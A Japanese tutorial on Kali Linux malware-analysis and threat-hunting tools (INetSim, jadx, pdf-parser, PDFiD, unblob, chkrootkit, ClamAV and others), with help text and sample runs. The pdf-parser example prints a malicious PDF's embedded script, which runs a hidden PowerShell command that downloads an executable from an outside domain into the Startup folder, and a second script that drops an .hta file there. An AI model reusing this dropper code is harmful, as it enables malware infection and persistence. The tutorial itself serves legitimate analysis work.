マルウェア分析のためのサンドボックス環境でマルウェアの挙動を確認するためのダミーのHTTPサーバーやダミーのFTPサーバーなどを提供します。
[提供サービス]
- HTTP / HTTPS
- SMTP / SMTPS
- POP3 / POP3S
- DNS
- FTP / FTP
- TFTP
- IRC
- NTP
- Ident
- Finger
- Syslog
- Daytime / Time / Echo / Chargen / Discard / Quotd / Dummy
■ 使用方法
root@kali:~# inetsim --help
Usage: /usr/bin/inetsim [options]
Available options:
--help Print this help message.
--version Show version information.
--config=<filename> Configuration file to use.
--log-dir=<directory> Directory logfiles are written to.
--data-dir=<directory> Directory containing service data.
--report-dir=<directory> Directory reports are written to.
--bind-address=<IP address> Default IP address to bind services to.
Overrides configuration option 'default_bind_address'.
--max-childs=<num> Default maximum number of child processes per service.
Overrides configuration option 'default_max_childs'.
--user=<username> Default user to run services.
Overrides configuration option 'default_run_as_user'.
--faketime-init-delta=<secs> Initial faketime delta (seconds).
Overrides configuration option 'faketime_init_delta'.
--faketime-auto-delay=<secs> Delay for auto incrementing faketime (seconds).
Overrides configuration option 'faketime_auto_delay'.
--faketime-auto-incr=<secs> Delta for auto incrementing faketime (seconds).
Overrides configuration option 'faketime_auto_increment'.
--session=<id> Session id to use. Defaults to main process id.
--pidfile=<filename> Pid file to use. Defaults to '/var/run/inetsim.pid'.
■ 使用例
root@kali:~# inetsim
INetSim 1.3.2 (2020-05-19) by Matthias Eckert & Thomas Hungenberg
Using log directory: /var/log/inetsim/
Using data directory: /var/lib/inetsim/
Using report directory: /var/log/inetsim/report/
Using configuration file: /etc/inetsim/inetsim.conf
Parsing configuration file.
Configuration file parsed successfully.
=== INetSim main process started (PID 2776) ===
Session ID: 2776
Listening on: 127.0.0.1
Real Date/Time: 2024-10-17 04:00:32
Fake Date/Time: 2024-10-17 04:00:32 (Delta: 0 seconds)
Forking services...
* dns_53_tcp_udp - started (PID 2778)
deprecated method; prefer start_server() at /usr/share/perl5/INetSim/DNS.pm line 69.
Attempt to start Net::DNS::Nameserver in a subprocess at /usr/share/perl5/INetSim/DNS.pm line 69.
* irc_6667_tcp - started (PID 2788)
* smtp_25_tcp - started (PID 2781)
* ident_113_tcp - started (PID 2791)
* discard_9_tcp - started (PID 2799)
* discard_9_udp - started (PID 2800)
* chargen_19_udp - started (PID 2804)
* http_80_tcp - started (PID 2779)
* smtps_465_tcp - started (PID 2782)
* ntp_123_udp - started (PID 2789)
* dummy_1_tcp - started (PID 2805)
* pop3s_995_tcp - started (PID 2784)
[...]
Simulation running.
# INetSimのDNSがエラーで動作しないため別途DNSプロキシを起動
root@kali:~# dnschef --fakeip 127.0.0.1 --fakeipv6 2001:db8::1
# HTTPリクエストを送信するとINetSimのダミーHTTPサーバーに接続される
root@kali:~# curl http://example.com
<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>
# FTP接続を行うとINetSimのダミーFTPサーバーに接続される
root@kali:~# ftp example.com
ftp: Trying 127.0.0.1 ...
Connected to example.com.
220 INetSim FTP Service ready.
Name (example.com:root): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
-rw-rw-rw- 1 1067 1067 28 Oct 17 03:02 sample.txt
226 Transfer complete.
ftp> bye
221 Goodbye.
jadx
.apk/.dex/.jar/.classなどに対応したJavaデコンパイラーです。
■ 使用方法
root@kali:~# jadx --help
usage: jadx [command] [options] <input files> (.apk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab, .xapk, .jadx.kts)
commands (use '<command> --help' for command options):
plugins - manage jadx plugins
options:
-d, --output-dir - output directory
-ds, --output-dir-src - output directory for sources
-dr, --output-dir-res - output directory for resources
-r, --no-res - do not decode resources
-s, --no-src - do not decompile source code
--single-class - decompile a single class, full name, raw or alias
--single-class-output - file or dir for write if decompile a single class
--output-format - can be 'java' or 'json', default: java
-e, --export-gradle - save as android gradle project
-j, --threads-count - processing threads count, default: 4
-m, --decompilation-mode - code output mode:
'auto' - trying best options (default)
'restructure' - restore code structure (normal java code)
'simple' - simplified instructions (linear, with goto\'s)
'fallback' - raw instructions without modifications
--show-bad-code - show inconsistent code (incorrectly decompiled)
--no-xml-pretty-print - do not prettify XML
--no-imports - disable use of imports, always write entire package name
--no-debug-info - disable debug info parsing and processing
--add-debug-lines - add comments with debug line numbers if available
--no-inline-anonymous - disable anonymous classes inline
--no-inline-methods - disable methods inline
--no-move-inner-classes - disable move inner classes into parent
--no-inline-kotlin-lambda - disable inline for Kotlin lambdas
--no-finally - don\'t extract finally block
--no-replace-consts - don\'t replace constant value with matching constant field
--escape-unicode - escape non latin characters in strings (with \u)
--respect-bytecode-access-modifiers - don\'t change original access modifiers
--mappings-path - deobfuscation mappings file or directory. Allowed formats: Tiny and Tiny v2 (both '.tiny'), Enigma (.mapping) or Enigma directory
--mappings-mode - set mode for handling the deobfuscation mapping file:
'read' - just read, user can always save manually (default)
'read-and-autosave-every-change' - read and autosave after every change
'read-and-autosave-before-closing' - read and autosave before exiting the app or closing the project
'ignore' - don\'t read or save (can be used to skip loading mapping files referenced in the project file)
--deobf - activate deobfuscation
--deobf-min - min length of name, renamed if shorter, default: 3
--deobf-max - max length of name, renamed if longer, default: 64
--deobf-whitelist - space separated list of classes (full name) and packages (ends with '.*') to exclude from deobfuscation, default: android.support.v4.* android.support.v7.* android.support.v4.os.* android.support.annotation.Px androidx.core.os.* androidx.annotation.Px
--deobf-cfg-file - deobfuscation mappings file used for JADX auto-generated names (in the JOBF file format), default: same dir and name as input file with '.jobf' extension
--deobf-cfg-file-mode - set mode for handling the JADX auto-generated names' deobfuscation map file:
'read' - read if found, don\'t save (default)
'read-or-save' - read if found, save otherwise (don\'t overwrite)
'overwrite' - don\'t read, always save
'ignore' - don\'t read and don\'t save
--deobf-use-sourcename - use source file name as class name alias
--deobf-res-name-source - better name source for resources:
'auto' - automatically select best name (default)
'resources' - use resources names
'code' - use R class fields names
--use-kotlin-methods-for-var-names - use kotlin intrinsic methods to rename variables, values: disable, apply, apply-and-hide, default: apply
--rename-flags - fix options (comma-separated list of):
'case' - fix case sensitivity issues (according to --fs-case-sensitive option),
'valid' - rename java identifiers to make them valid,
'printable' - remove non-printable chars from identifiers,
or single 'none' - to disable all renames
or single 'all' - to enable all (default)
--integer-format - how integers are displayed:
'auto' - automatically select (default)
'decimal' - use decimal
'hexadecimal' - use hexadecimal
--fs-case-sensitive - treat filesystem as case sensitive, false by default
--cfg - save methods control flow graph to dot file
--raw-cfg - save methods control flow graph (use raw instructions)
-f, --fallback - set '--decompilation-mode' to 'fallback' (deprecated)
--use-dx - use dx/d8 to convert java bytecode
--comments-level - set code comments level, values: error, warn, info, debug, user-only, none, default: info
--log-level - set log level, values: quiet, progress, error, warn, info, debug, default: progress
-v, --verbose - verbose output (set --log-level to DEBUG)
-q, --quiet - turn off output (set --log-level to QUIET)
--version - print jadx version
-h, --help - print this help
■ 使用例
root@kali:~# jadx -d /root/out /root/mastodon-githubRelease.apk
INFO - loading ...
INFO - processing ...
INFO - done
root@kali:~# tree out/sources/
out/sources/
├── a
│ ├── a.java
│ └── b.java
├── a0
│ └── a.java
├── a1
│ ├── b.java
│ ├── c.java
│ └── d.java
├── a2
│ ├── a.java
│ ├── b.java
│ └── c.java
├── android
│ └── util
│ └── FloatProperty.java
├── androidx
│ ├── annotation
│ │ └── Keep.java
│ ├── recyclerview
│ │ └── widget
│ │ ├── RecyclerView.java
[...]
GUIによる操作も可能
pdf-parser
PDFファイルを解析して使用されているオブジェクトなどの基本要素を特定します。
■ 使用方法
root@kali:~# pdf-parser --help
Usage: pdf-parser.py [options] pdf-file|zip-file|url
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-m, --man Print manual
-s SEARCH, --search=SEARCH
string to search in indirect objects (except streams)
-f, --filter pass stream object through filters (FlateDecode,
ASCIIHexDecode, ASCII85Decode, LZWDecode and
RunLengthDecode only)
-o OBJECT, --object=OBJECT
id(s) of indirect object(s) to select, use comma (,)
to separate ids (version independent)
-r REFERENCE, --reference=REFERENCE
id of indirect object being referenced (version
independent)
-e ELEMENTS, --elements=ELEMENTS
type of elements to select (cxtsi)
-w, --raw raw output for data and filters
-a, --stats display stats for pdf document
-t TYPE, --type=TYPE type of indirect object to select
-O, --objstm parse stream of /ObjStm objects
-v, --verbose display malformed PDF elements
-x EXTRACT, --extract=EXTRACT
filename to extract malformed content to
-H, --hash display hash of objects
-n, --nocanonicalizedoutput
do not canonicalize the output
-d DUMP, --dump=DUMP filename to dump stream content to
-D, --debug display debug info
-c, --content display the content for objects without streams or
with streams without filters
--searchstream=SEARCHSTREAM
string to search in streams
--unfiltered search in unfiltered streams
--casesensitive case sensitive search in streams
--regex use regex to search in streams
--overridingfilters=OVERRIDINGFILTERS
override filters with given filters (use raw for the
raw stream content)
-g, --generate generate a Python program that creates the parsed PDF
file
--generateembedded=GENERATEEMBEDDED
generate a Python program that embeds the selected
indirect object as a file
-y YARA, --yara=YARA YARA rule (or directory or @file) to check streams
(can be used with option --unfiltered)
--yarastrings Print YARA strings
--decoders=DECODERS decoders to load (separate decoders with a comma , ;
@file supported)
--decoderoptions=DECODEROPTIONS
options for the decoder
-k KEY, --key=KEY key to search in dictionaries
-j, --jsonoutput produce json output
■ 使用例
root@kali:~# pdf-parser evil.pdf --stats
Comment: 4
XREF: 0
Trailer: 0
StartXref: 1
Indirect object: 23
Indirect objects with a stream: 6, 7, 8, 9, 10, 13, 14, 15, 18, 21, 25, 27, 29, 30, 31, 32, 19
15: 6, 7, 8, 9, 10, 13, 14, 15, 20, 24, 25, 29, 30, 31, 32
/CMap 1: 27
/Catalog 1: 1
/Font 2: 22, 26
/FontDescriptor 1: 23
/Metadata 1: 21
/ObjStm 1: 18
/XRef 1: 19
Unreferenced indirect objects: 6 0 R, 7 0 R, 8 0 R, 9 0 R, 10 0 R, 13 0 R, 14 0 R, 15 0 R, 18 0 R, 19 0 R, 26 0 R, 30 0 R, 31 0 R
Unreferenced indirect objects without /ObjStm objects: 6 0 R, 7 0 R, 8 0 R, 9 0 R, 10 0 R, 13 0 R, 14 0 R, 15 0 R, 19 0 R, 26 0 R, 30 0 R, 31 0 R
Search keywords:
/AcroForm 1: 1
# ストリームの中に"<script"というテキストが含まれているオブジェクトを検索
root@kali:~# pdf-parser evil.pdf --searchstream "<script" --filter
obj 7 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 616
>>
b'<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.65</version><creator>Syncfusion</creator><producer>Syncfusion</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><encryption><permissions><accessibleContent>1</accessibleContent><contentCopy>1</contentCopy><documentAssembly>1</documentAssembly><formFieldFilling>1</formFieldFilling><modifyAnnots>1</modifyAnnots><print>1</print><printHighQuality>1</printHighQuality><change>1</change><plaintextMetadata>1</plaintextMetadata></permissions></encryption><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression><linearized>1</linearized><script language="jscript">var c = \'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri \\\\"ttps://brazilanimalshelp.com/updating/stale.exe\\\\" -OutFile \\\\"$env:APPDATA\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\SecurityUpdate.exe\\\\"; Start-Process -FilePath \\\\"$env:APPDATA\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\SecurityUpdate.exe\\\\""\'; new ActiveXObject(\'WScript.Shell\').Run(c);</script></pdf></present><acrobat><acrobat7><dynamicRender>required</dynamicRender></acrobat7></acrobat></config>'
obj 8 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 408
>>
b'<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/"><subform name="form1" locale="en_US" layout="tb"><pageSet><pageArea name="Page1"><contentArea x="0pt" y="0pt" w="595pt" h="842pt" /><medium short="595pt" long="842pt" /></pageArea></pageSet><subform name="subform1" layout="tb" w="595pt"><event activity="docReady" ref="$host" name="event__docReady"><script contentType="application/x-javascript">timeout = app.setTimeOut("event.target.exportXFAData({cPath: \\"/c/users/\\" + identity.loginName + \\"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/officeupdate.hta\\"});", 500);</script></event><margin /></subform></subform></template>'
PDFiD
PDFファイルがどのような要素で構成されているのかを簡易的に解析します。
■ 使用方法
root@kali:~# pdfid --help
Usage: pdfid [options] [pdf-file|zip-file|url|@file] ...
Arguments:
pdf-file and zip-file can be a single file, several files, and/or @file
@file: run PDFiD on each file listed in the text file specified
wildcards are supported
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-s, --scan scan the given directory
-a, --all display all the names
-e, --extra display extra data, like dates
-f, --force force the scan of the file, even without proper %PDF
header
-d, --disarm disable JavaScript and auto launch
-p PLUGINS, --plugins=PLUGINS
plugins to load (separate plugins with a comma , ;
@file supported)
-c, --csv output csv data when using plugins
-m MINIMUMSCORE, --minimumscore=MINIMUMSCORE
minimum score for plugin results output
-v, --verbose verbose (will also raise catched exceptions)
-S SELECT, --select=SELECT
selection expression
-n, --nozero supress output for counts equal to zero
-o OUTPUT, --output=OUTPUT
output to log file
--pluginoptions=PLUGINOPTIONS
options for the plugin
-l, --literalfilenames
take filenames literally, no wildcard matching
--recursedir Recurse directories (wildcards and here files (@...)
allowed)
■ 使用例
root@kali:~# pdfid evil.pdf
PDFiD 0.2.8 evil.pdf
PDF Header: %PDF-1.5
obj 23
endobj 23
stream 18
endstream 17
xref 0
trailer 0
startxref 1
/Page 0
/Encrypt 0
/ObjStm 1
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
Cutter
リバースエンジニアリングフレームワークのRadare2をフォークして開発されているRizinのGUIを提供します。
■ 使用例
root@kali:~# cutter
関数のコールグラフ、ディスアセンブル表示、Hex表示、デコンパイル表示
shed (Simple Hex Editor)
ターミナル上で操作するシンプルなHexエディタです。
■ 使用方法
root@kali:~# shed --help
usage: shed [OPTIONS] [FILE]
options:
-r / --readonly open FILE read only
-s / --start=OFFSET position cursor to offset
-H / --hex start with hex offsets
-L / --length set length (for device files)
-h / --help show help and exit
-v / --version show version and exit
■ 使用方法
root@kali:~# shed -r malware_sample
malware_sample (regular file) (read only)
offset asc hex dec oct bin
00000000: 7F 127 177 01111111
00000001: E 45 069 105 01000101
00000002: L 4C 076 114 01001100
00000003: F 46 070 106 01000110
00000004: 02 002 002 00000010
00000005: 01 001 001 00000001
00000006: 01 001 001 00000001
00000007: 00 000 000 00000000
00000008: 00 000 000 00000000
00000009: 00 000 000 00000000
00000010: 00 000 000 00000000
00000011: 00 000 000 00000000
00000012: 00 000 000 00000000
00000013: 00 000 000 00000000
00000014: 00 000 000 00000000
00000015: 00 000 000 00000000
00000016: 02 002 002 00000010
00000017: 00 000 000 00000000
00000018: > 3E 062 076 00111110
00000019: 00 000 000 00000000
00000020: 01 001 001 00000001
00000021: 00 000 000 00000000
00000022: 00 000 000 00000000
00000023: 00 000 000 00000000
00000024: 94 148 224 10010100
00000025: 01 001 001 00000001
00000026: @ 40 064 100 01000000
00000027: 00 000 000 00000000
00000028: 00 000 000 00000000
00000029: 00 000 000 00000000
SPACE|E edit S|W|F search J jump to T dec/hex D dump 1|2|4 cursor
X exit R|N repeat B bin edit A ext. asc P preview ` endian
unblob
30種類以上のアーカイブ、圧縮、ファイルシステム形式の未知のバイナリblobを解析し、そのコンテンツを再帰的に抽出し、未知のチャンクを切り出します。
■ 使用方法
root@kali:~# unblob --help
Usage: unblob [OPTIONS] FILE
Options:
-e, --extract-dir DIRECTORY Extract the files to this directory. Will be
created if doesn\'t exist.
-f, --force Force extraction even if outputs already
exist (they are removed).
-d, --depth INTEGER RANGE Recursion depth. How deep should we extract
containers. [default: 10; x>=1]
-n, --randomness-depth INTEGER RANGE
Entropy calculation depth. How deep should
we calculate randomness for unknown files? 1
means input files only, 0 turns it off.
[default: 1; x>=0]
-P, --plugins-path PATH Load plugins from the provided path.
-S, --skip-magic TEXT Skip processing files with given magic
prefix. The provided values are appended to
unblob\'s own skip magic list unless --clear-
skip-magic is provided. [default: BFLT,
Composite Document File V2 Document, Erlang
BEAM file, GIF, GNU message catalog, HP
Printer Job Language, Intel serial flash for
PCH ROM, JPEG, Java module image, MPEG, MS
Windows icon resource, Macromedia Flash
data, Microsoft Excel, Microsoft PowerPoint,
Microsoft Word, OpenDocument, PDF document,
PNG, SQLite, TrueType Font data, Web Open
Font Format, Windows Embedded CE binary
image, Xilinx BIT data, compiled Java class,
magic binary file, python]
--skip-extension TEXT Skip processing files with given extension
[default: .rlib]
--clear-skip-magics Clear unblob\'s own skip magic list.
-p, --process-num INTEGER RANGE
Number of worker processes to process files
parallelly. [default: 8; x>=1]
--report PATH File to store metadata generated during the
extraction process (in JSON format).
--log PATH File to save logs (in text format). Defaults
to unblob.log.
-s, --skip-extraction Only carve chunks and skip further
extraction
-k, --keep-extracted-chunks Keep extracted chunks
-v, --verbose Verbosity level, counting, maximum level: 3
(use: -v, -vv, -vvv)
--show-external-dependencies Shows commands needs to be available for
unblob to work properly
--version Shows unblob version
-h, --help Show this message and exit.
■ 使用例
# Zip形式で圧縮されたファームウェアをunzipで展開
root@kali:~# unzip ER706W_1.1.2_Build_20240726.zip -d ER706W_1.1.2_unzip
root@kali:~# tree ER706W_1.1.2_unzip
ER706W_1.1.2_unzip
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin
└── GPL License Terms.pdf
# Zip形式で圧縮されたファームウェアをunblobで展開
root@kali:~# unblob -e ER706W_1.1.2_unblob ER706W_1.1.2_Build_20240726.zip
╭───────────────────────────────────────────────────────────── unblob (24.11.13) ──────────────────────────────────────────────────────────────╮
│ Extracted files: 63 │
│ Extracted directories: 7 │
│ Extracted links: 0 │
│ Extraction directory size: 152.02 MB │
│ Chunks identification ratio: 99.08% │
╰────────────────────────────────────────────────────────────────── Summary ───────────────────────────────────────────────────────────────────╯
Chunks distribution
┏━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━┓
┃ Chunk type ┃ Size ┃ Ratio ┃
┡━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━┩
│ TAR │ 40.21 MB │ 32.41% │
│ ZIP │ 34.37 MB │ 27.70% │
│ UBI │ 27.38 MB │ 22.06% │
│ GZIP │ 10.78 MB │ 8.68% │
│ ELF64 │ 10.22 MB │ 8.24% │
│ UNKNOWN │ 1.14 MB │ 0.92% │
└────────────┴──────────┴────────┘
root@kali:~# tree ER706W_1.1.2_unblob
ER706W_1.1.2_unblob
└── ER706W_1.1.2_Build_20240726.zip_extract
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin_extract
│ ├── 0-1187109.unknown
│ ├── 1187109-29891877.ubi
│ ├── 29891877-29895853.unknown
│ └── 29895853-38645062.gzip_extract
│ ├── gzip.uncompressed
│ └── gzip.uncompressed_extract
│ └── database
│ ├── ips
│ │ ├── GeoLite2-Country.mmdb
│ │ ├── emerging.rules.tar.gz
│ │ ├── emerging.rules.tar.gz_extract
│ │ │ ├── rules.tar
│ │ │ └── rules.tar_extract
│ │ │ ├── 3coresec.rules
│ │ │ ├── BSD-License.txt
│ │ │ ├── LICENSE
│ │ │ ├── botcc.portgrouped.rules
│ │ │ ├── botcc.rules
│ │ │ ├── ciarmy.rules
│ │ │ ├── classification.config
│ │ │ ├── compromised-ips.txt
│ │ │ ├── compromised.rules
│ │ │ ├── drop.rules
[...]
Threat Hunting and Security Auditing Tools
Threat Hunting
chkrootkit
システムがルートキットに感染している兆候を検出します。
■ 使用方法
root@kali:~# chkrootkit --help
Usage: /usr/sbin/chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-e 'FILE1 FILE2' exclude files/dirs from results. Must be followed by a space-separated list of files/dirs.
Read /usr/share/doc/chkrootkit/README.FALSE-POSITIVES first.
-s REGEXP filter results of sniffer test through 'grep -Ev REGEXP' to exclude expected
PACKET_SNIFFERs. Read /usr/share/doc/chkrootkit/README.FALSE-POSITIVES first.
-r DIR use DIR as the root directory
-p DIR1:DIR2:DIRN path for the external commands used by chkrootkit
-n skip NFS mount points
-T FSTYPE skip mount points of the specified file system type
■ 使用例
# 利用可能なテストの一覧を表示
root@kali:~# chkrootkit -l
/usr/sbin/chkrootkit: tests: aliens asp bindshell lkm rexedcs sniffer w55808 wted scalper slapper z2 chkutmp OSX_RSPLUG amd basename biff chfn chsh cron crontab date du dirname echo egrep env find fingerd gpm grep hdparm su ifconfig inetd inetdconf identd init killall ldsopreload login ls lsof mail mingetty netstat named passwd pidof pop2 pop3 ps pstree rpcinfo rlogind rshd slogin sendmail sshd syslogd tar tcpd tcpdump top telnetd timed traceroute vdir w write
# aliensテスト(ルートキットや不審なファイルの兆候を検出)を実行
root@kali:~# chkrootkit aliens
ROOTDIR is `/'
Checking `aliens'... started
Searching for suspicious files in /var/tmp/dev... not found
Searching for known suspicious directories... not found
Searching for known suspicious files... not found
[...]
Searching for Syslogk LKM rootkit... WARNING
WARNING: Possible Malicious Syslogk LKM rootkit installed: /proc/syslogk
[...]
ClamAV
ウイルス、マルウェア、その他の悪意のある脅威を検出するためのアンチウイルスエンジンです。
■ 使用方法
root@kali:~# clamscan --help
clamscan [options] [file/directory/-]
--help -h Show this help
--version -V Print version number
--verbose -v Be verbose
--archive-verbose -a Show filenames inside scanned archives
--debug Enable libclamav\'s debug messages
--quiet Only output error messages
--stdout Write to stdout instead of stderr. Does not affect 'debug' messages.
--no-summary Disable summary at end of scanning
--infected -i Only print infected files
--suppress-ok-results -o Skip printing OK files
--bell Sound bell on virus detection
--tempdir=DIRECTORY Create temporary files in DIRECTORY
--leave-temps[=yes/no(*)] Do not remove temporary files
--force-to-disk[=yes/no(*)] Create temporary files for nested file scans that would otherwise be in-memory only
--gen-json[=yes/no(*)] Generate JSON metadata for the scanned file(s). For testing & development use ONLY.
JSON will be printed if --debug is enabled.
A JSON file will dropped to the temp directory if --leave-temps is enabled.
--database=FILE/DIR -d FILE/DIR Load virus database from FILE or load all supported db files from DIR
--official-db-only[=yes/no(*)] Only load official signatures
--fail-if-cvd-older-than=days Return with a nonzero error code if virus database outdated.
--log=FILE -l FILE Save scan report to FILE
--recursive[=yes/no(*)] -r Scan subdirectories recursively
--allmatch[=yes/no(*)] -z Continue scanning within file after finding a match
--cross-fs[=yes(*)/no] Scan files and directories on other filesystems
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)
--file-list=FILE -f FILE Scan files from FILE
--remove[=yes/no(*)] Remove infected files. Be careful!
=DIRECTORY Move infected files into DIRECTORY
--copy=DIRECTORY Copy infected files into DIRECTORY
--exclude=REGEX Don\'t scan file names matching REGEX
--exclude-dir=REGEX Don\'t scan directories matching REGEX
--include=REGEX Only scan file names matching REGEX
--include-dir=REGEX Only scan directories matching REGEX
--bytecode[=yes(*)/no] Load bytecode from the database
--bytecode-unsigned[=yes/no(*)] Load unsigned bytecode
**Caution**: You should NEVER run bytecode signatures from untrusted sources.
Doing so may result in arbitrary code execution.
--bytecode-timeout=N Set bytecode timeout (in milliseconds)
--statistics[=none(*)/bytecode/pcre] Collect and print execution statistics
--detect-pua[=yes/no(*)] Detect Possibly Unwanted Applications
--exclude-pua=CAT Skip PUA sigs of category CAT
--include-pua=CAT Load PUA sigs of category CAT
--detect-structured[=yes/no(*)] Detect structured data (SSN, Credit Card)
--structured-ssn-format=X SSN format (0=normal,1=stripped,2=both)
--structured-ssn-count=N Min SSN count to generate a detect
--structured-cc-count=N Min CC count to generate a detect
--structured-cc-mode=X CC mode (0=credit debit and private label, 1=credit cards only
--scan-mail[=yes(*)/no] Scan mail files
--phishing-sigs[=yes(*)/no] Enable email signature-based phishing detection
--phishing-scan-urls[=yes(*)/no] Enable URL signature-based phishing detection
--heuristic-alerts[=yes(*)/no] Heuristic alerts
--heuristic-scan-precedence[=yes/no(*)] Stop scanning as soon as a heuristic match is found
--normalize[=yes(*)/no] Normalize html, script, and text files. Use normalize=no for yara compatibility
--scan-pe[=yes(*)/no] Scan PE files
--scan-elf[=yes(*)/no] Scan ELF files
--scan-ole2[=yes(*)/no] Scan OLE2 containers
--scan-pdf[=yes(*)/no] Scan PDF files
--scan-swf[=yes(*)/no] Scan SWF files
--scan-html[=yes(*)/no] Scan HTML files
--scan-xmldocs[=yes(*)/no] Scan xml-based document files
--scan-hwp3[=yes(*)/no] Scan HWP3 files
--scan-onenote[=yes(*)/no] Scan OneNote files
--scan-archive[=yes(*)/no] Scan archive files (supported by libclamav)
--scan-image[=yes(*)/no] Scan image (graphics) files
--scan-image-fuzzy-hash[=yes(*)/no] Detect files by calculating image (graphics) fuzzy hashes
--alert-broken[=yes/no(*)] Alert on broken executable files (PE & ELF)
--alert-broken-media[=yes/no(*)] Alert on broken graphics files (JPEG, TIFF, PNG, GIF)
--alert-encrypted[=yes/no(*)] Alert on encrypted archives and documents
--alert-encrypted-archive[=yes/no(*)] Alert on encrypted archives
--alert-encrypted-doc[=yes/no(*)] Alert on encrypted documents
--alert-macros[=yes/no(*)] Alert on OLE2 files containing VBA macros
--alert-exceeds-max[=yes/no(*)] Alert on files that exceed max file size, max scan size, or max recursion limit
--alert-phishing-ssl[=yes/no(*)] Alert on emails containing SSL mismatches in URLs
--alert-phishing-cloak[=yes/no(*)] Alert on emails containing cloaked URLs
--alert-partition-intersection[=yes/no(*)] Alert on raw DMG image files containing partition intersections
--nocerts Disable authenticode certificate chain verification in PE files
--dumpcerts Dump authenticode certificate chain in PE files
--max-scantime=#n Scan time longer than this will be skipped and assumed clean (milliseconds)
--max-filesize=#n Files larger than this will be skipped and assumed clean
--max-scansize=#n The maximum amount of data to scan for each container file (**)
--max-files=#n The maximum number of files to scan for each container file (**)
--max-recursion=#n Maximum archive recursion level for container file (**)
--max-dir-recursion=#n Maximum directory recursion level
--max-embeddedpe=#n Maximum size file to check for embedded PE
--max-htmlnormalize=#n Maximum size of HTML file to normalize
--max-htmlnotags=#n Maximum size of normalized HTML file to scan
--max-scriptnormalize=#n Maximum size of script file to normalize
--max-ziptypercg=#n Maximum size zip to type reanalyze
--max-partitions=#n Maximum number of partitions in disk image to be scanned
--max-iconspe=#n Maximum number of icons in PE file to be scanned
--max-rechwp3=#n Maximum recursive calls to HWP3 parsing function
--pcre-match-limit=#n Maximum calls to the PCRE match function.
--pcre-recmatch-limit=#n Maximum recursive calls to the PCRE match function.
--pcre-max-filesize=#n Maximum size file to perform PCRE subsig matching.
--disable-cache Disable caching and cache checks for hash sums of scanned files.
root@kali:~# clamd --help
clamd [options]
--help -h Show this help
--version -V Show version number
--foreground -F Run in foreground; do not daemonize
--debug Enable debug mode
--log=FILE -l FILE Log into FILE
--config-file=FILE -c FILE Read configuration from FILE
--fail-if-cvd-older-than=days Return with a nonzero error code if virus database outdated
--datadir=DIRECTORY Load signatures from DIRECTORY
--pid=FILE -p FILE Write the daemon\'s pid to FILE
root@kali:~# clamdscan --help
clamdscan [options] [file/directory/-]
--help -h Show this help
--version -V Print version number and exit
--verbose -v Be verbose
--quiet Be quiet, only output error messages
--stdout Write to stdout instead of stderr. Does not affect 'debug' messages.
(this help is always written to stdout)
--log=FILE -l FILE Save scan report in FILE
--file-list=FILE -f FILE Scan files from FILE
--ping -p A[:I] Ping clamd up to [A] times at optional interval [I] until it responds.
--wait -w Wait up to 30 seconds for clamd to start. Optionally use alongside --ping to set attempts [A] and interval [I] to check clamd.
--remove Remove infected files. Be careful!
--move=DIRECTORY Move infected files into DIRECTORY
--copy=DIRECTORY Copy infected files into DIRECTORY
--config-file=FILE -c Read configuration from FILE.
--allmatch -z Continue scanning within file after finding a match.
--multiscan -m Force MULTISCAN mode
--infected -i Only print infected files
--no-summary Disable summary at end of scanning
--reload Request clamd to reload virus database
--fdpass Pass filedescriptor to clamd (useful if clamd is running as a different user)
--stream Force streaming files to clamd (for debugging and unit testing)
■ 使用例
# ウィルスデータベースを更新
# デーモンモードで起動する場合はfreshclam -d
root@kali:~# freshclam
Thu Dec 5 11:55:33 2024 -> ClamAV update process started at Thu Dec 5 11:55:33 2024
[...]
# ワンタイムスキャンを実行(実行のたびにClamAVエンジンを立ち上げウィルスデータベースをロードする)
root@kali:~# clamscan --suppress-ok-results --recursive --database /var/lib/clamav /var/www/html
Loading: 12s, ETA: 0s [========================>] 8.70M/8.70M sigs
Compiling: 3s, ETA: 0s [========================>] 41/41 tasks
/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 8700889
Engine version: 1.4.1
Scanned directories: 389
Scanned files: 2655
Infected files: 1
Data scanned: 137.27 MB
Data read: 63.64 MB (ratio 2.16:1)
Time: 43.325 sec (0 m 43 s)
Start Date: 2024:12:06 02:38:38
End Date: 2024:12:06 02:39:21
# デーモンモードでエンジンを起動
root@kali:~# clamd
# デーモンモードで起動したエンジンにを使ってスキャンを実行
root@kali:~# clamdscan --config-file /etc/clamav/clamd.conf /var/www/html
